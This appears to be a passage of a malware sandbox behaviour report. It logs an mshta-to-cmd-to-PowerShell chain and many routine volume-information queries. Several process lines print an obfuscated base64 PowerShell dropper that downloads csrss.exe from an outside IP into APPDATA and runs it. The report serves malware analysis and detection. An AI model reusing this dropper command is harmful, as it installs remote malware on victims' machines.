    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA6B.tmp" "c:\Users\user\AppData\Local\Temp\l1pl2equ\CSC883B0A053CD34D78B131B177ADC31BC6.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfbuqujlcdb6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlcmrfzklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1pti5etgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1xahlwvndhvgvvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkwgdllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxb2osdwludcagicagicagicagicagicagicagicagicagicagicagicb0znv1a1ossw50uhryicagicagicagicagicagicagicagicagicagicagicagiffududoktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicj0slzneef5s28iicagicagicagicagicagicagicagicagicagicagicagic1oyu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicagqkh0wsagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrqbkfczxawejo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtkxljg4lzyymc9jc3jzcy5leguilcikzu52okfquerbvefcy3nyc3muzxhliiwwldapo3n0qvjulxnszwvqkdmpo0luvm9lzs1pvgvnicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3nyc3muzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfbuqujlcdb6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlcmrfzklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1pti5etgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1xahlwvndhvgvvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkwgdllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxb2osdwludcagicagicagicagicagicagicagicagicagicagicagicb0znv1a1ossw50uhryicagicagicagicagicagicagicagicagicagicagicagiffududoktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicj0slzneef5s28iicagicagicagicagicagicagicagicagicagicagicagic1oyu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicagqkh0wsagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrqbkfczxawejo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtkxljg4lzyymc9jc3jzcy5leguilcikzu52okfquerbvefcy3nyc3muzxhliiwwldapo3n0qvjulxnszwvqkdmpo0luvm9lzs1pvgvnicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3nyc3muzxhlig=='+[char]0x22+'))')))"
    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfbuqujlcdb6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlcmrfzklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1pti5etgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1xahlwvndhvgvvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkwgdllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxb2osdwludcagicagicagicagicagicagicagicagicagicagicagicb0znv1a1ossw50uhryicagicagicagicagicagicagicagicagicagicagicagiffududoktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicj0slzneef5s28iicagicagicagicagicagicagicagicagicagicagicagic1oyu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicagqkh0wsagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrqbkfczxawejo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtkxljg4lzyymc9jc3jzcy5leguilcikzu52okfquerbvefcy3nyc3muzxhliiwwldapo3n0qvjulxnszwvqkdmpo0luvm9lzs1pvgvnicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3nyc3muzxhlig=='+[char]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jfbuqujlcdb6icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagqwrelvr5ugugicagicagicagicagicagicagicagicagicagicagicaglw1ftwjlcmrfzklosvrpb04gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvsbe1pti5etgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagig1xahlwvndhvgvvlhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbkwgdllhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbxb2osdwludcagicagicagicagicagicagicagicagicagicagicagicb0znv1a1ossw50uhryicagicagicagicagicagicagicagicagicagicagicagiffududoktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicj0slzneef5s28iicagicagicagicagicagicagicagicagicagicagicagic1oyu1lc3bby2ugicagicagicagicagicagicagicagicagicagicagicagqkh0wsagicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagicrqbkfczxawejo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtkxljg4lzyymc9jc3jzcy5leguilcikzu52okfquerbvefcy3nyc3muzxhliiwwldapo3n0qvjulxnszwvqkdmpo0luvm9lzs1pvgvnicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcy3nyc3muzxhlig=='+[char]0x22+'))')))"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
